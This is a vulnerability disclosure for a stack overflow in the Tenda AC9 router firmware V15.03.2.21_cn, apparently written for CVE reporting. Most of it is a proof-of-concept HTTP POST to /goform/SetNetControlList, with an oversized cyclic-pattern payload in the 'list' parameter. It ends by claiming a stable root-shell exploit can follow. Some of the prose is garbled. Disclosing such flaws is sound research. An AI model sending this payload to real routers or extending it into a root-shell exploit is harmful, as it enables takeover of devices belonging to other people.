Tenda AC9 V15.03.2.21_cn stack overflow
Overview
- Manufacturer's website information:https://www.tenda.com.cn/profile/contact.html
- Firmware download address : https://www.tenda.com.cn/download/default.html
1. Affected version
Figure 1 shows the latest firmware Ba of the router
Vulnerability details
Formsetqosband function dest copies the matched content to the stack through regular expression without judging the size, resulting in stack overflow vulnerability. In fact, the parameters of NPTR, V12, V10 and V11 are controllable, and there are stack overflow vulnerabilities
Recurring vulnerabilities and POC
In order to reproduce the vulnerability, the following steps can be followed:
- Use the fat simulation firmware V15.03.2.21_cn
- Attack with the following POC attacks
POST /goform/SetNetControlList HTTP/1.1
Host: 192.168.11.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko/20100101 Firefox/96.0
Accept: */*
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest
Content-Length: 1068
Origin: http://192.168.11.1
Connection: close
Referer: http://192.168.11.1/net_control.html?random=0.0870818490459091&
Cookie: password=7c90ed4e4d4bf1e300aa08103057ccbcjbz1qw
netControlEn=1&list=;0;9c:fc:e8:1a:33:80aaaabaaacaaadaaaeaaafaaagaaahaaaiaaajaaakaaalaaamaaanaaaoaaapaaaqaaaraaasaaataaauaaavaaawaaaxaaayaaazaabbaabcaabdaabeaabfaabgaabhaabiaabjaabkaablaabmaabnaaboaabpaabqaabraabsaabtaabuaabvaabwaabxaabyaabzaacbaaccaacdaaceaacfaacgaachaaciaacjaackaaclaacmaacnaacoaacpaacqaacraacsaactaacuaacvaacwaacxaacyaaczaadbaadcaaddaadeaadfaadgaadhaadiaadjaadkaadlaadmaadnaadoaadpaadqaadraadsaadtaaduaadvaadwaadxaadyaadzaaebaaecaaedaaeeaaefaaegaaehaaeiaaejaaekaaelaaemaaenaaeoaaepaaeqaaeraaesaaetaaeuaaevaaewaaexaaeyaaezaafbaafcaafdaafeaaffaafgaafhaafiaafjaafkaaflaafmaafnaafoaafpaafqaafraafsaaftaafuaafvaafwaafxaafyaafzaagbaagcaagdaageaagfaaggaaghaagiaagjaagkaaglaagmaagnaagoaagpaagqaagraagsaagtaaguaagvaagwaagxaagyaagzaahbaahcaahdaaheaahfaahgaahhaahiaahjaahkaahlaahmaahnaahoaahpaahqaahraahsaahtaahuaahvaahwaahxaahyaahzaaibaaicaaidaaieaaifaaigaaihaaiiaaijaaikaailaaimaainaaioaaipaaiqaairaaisaaitaaiuaaivaaiwaaixaaiyaaizaajbaajcaajdaajeaajfaajgaajhaajiaajjaajkaajlaajmaajnaajoaajpaajqaajraajsaajtaajuaajvaajwaajxaajyaajzaakbaakcaakdaakeaakfaak;0;0
The reproduction results are as follows:
Figure 2 POC attack effect
Finally, you can write exp, which can achieve a very stable effect of obtaining the root shell



